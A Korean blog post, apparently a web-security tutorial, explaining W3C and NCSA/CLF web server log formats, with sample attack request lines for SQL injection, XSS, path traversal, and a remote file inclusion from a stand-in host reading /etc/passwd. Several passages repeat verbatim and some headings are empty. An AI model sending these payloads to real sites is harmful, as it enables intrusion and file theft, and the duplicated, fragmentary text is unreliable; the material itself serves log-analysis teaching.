★ W3C 유형
( 아래 예제들은 임의로 작성한 것입니다. 파라미터 뒷부분의 값들만 보시면 되겟습니다. 파라미터 이름은 중요하지 않습니다. )
예제 유형 1) SQL Injection
- 원본 : /bbs/bbs.asp ? id = 100
- 공격 : /bbs/bbs.asp ? id = 100 '
예제 유형 2) XSS
- 원본 : /bbs/bbs.asp ? id = 100
- 공격 : /bbs/bbs.asp ? id = <script> alert("XSS") </script>
예제 유형 3) Download
- 원본 : /bbs/bbs.asp ? id = 100
- 공격 : /bbs/bbs.asp ? id = ../../bbs/bbs.asp
예제 유형 4) PHP Injection
- 원본 : /bbs/bbs.asp ? id = 100
- 공격 : /bbs/bbs.asp ? id = http://xxx.com/a.txt ? name= /etc/passwd
★ NCSA 유형
☆ Apache (httpd.conf)
※ common (일반형식)
※ combined (확장형식)
W3C 포맷은 MS 계열의 IIS 기본 설정에서 사용되고 있으나 사용자의 설정 방법에 따라 NCSA 형태로 바꾸거나 로그 생성 주기와 위치 등도 임의로 변경 가능하다.
( 아래 예제들은 임의로 작성한 것입니다. 파라미터 뒷부분의 값들만 보시면 되겟습니다. 파라미터 이름은 중요하지 않습니다. )
예제 유형 1) SQL Injection
- 원본 : /bbs/bbs.asp ? id = 100
- 공격 : /bbs/bbs.asp ? id = 100 '
예제 유형 2) XSS
- 원본 : /bbs/bbs.asp ? id = 100
- 공격 : /bbs/bbs.asp ? id = <script> alert("XSS") </script>
예제 유형 3) Download
- 원본 : /bbs/bbs.asp ? id = 100
- 공격 : /bbs/bbs.asp ? id = ../../bbs/bbs.asp
예제 유형 4) PHP Injection
- 원본 : /bbs/bbs.asp ? id = 100
- 공격 : /bbs/bbs.asp ? id = http://xxx.com/a.txt ? name= /etc/passwd
★ NCSA 유형
CLF (Common Logfile Format) 라고도 불린다.
CLF는 웹서버의 원조라 할 수 있는 NCSA 계열의 웹서버에서 사용하는 파일형식으로 현재 대부분의 웹서버에서 지원하고 있다. 웹서버마다 자체적으로 로그파일의 형식을 제안하고는 있지만, 대부분의 웹서버 S/W의 제작사는 표준로그파일형식을 지원하고 있다. 표준로그파일은 보통 Transfer 또는 Access Logfile이라 불리며 파일이름은 access_log와 같이 정하고 있다.
CLF는 웹서버의 원조라 할 수 있는 NCSA 계열의 웹서버에서 사용하는 파일형식으로 현재 대부분의 웹서버에서 지원하고 있다. 웹서버마다 자체적으로 로그파일의 형식을 제안하고는 있지만, 대부분의 웹서버 S/W의 제작사는 표준로그파일형식을 지원하고 있다. 표준로그파일은 보통 Transfer 또는 Access Logfile이라 불리며 파일이름은 access_log와 같이 정하고 있다.
☆ Apache (httpd.conf)
※ common (일반형식)
※ combined (확장형식)
'Web H&S > Web Basic' 카테고리의 다른 글
| 국내 환경에서의 취약점 분류 (0) | 2010.12.06 |
|---|---|
| OWASP Top 10 (2010.11) (0) | 2010.12.06 |
| HTTP 메소드 종류 및 로그에 남는 정보 (0) | 2010.12.06 |
| Get & Post Method (0) | 2010.11.29 |
| HTTP Request & Response (0) | 2010.11.29 |
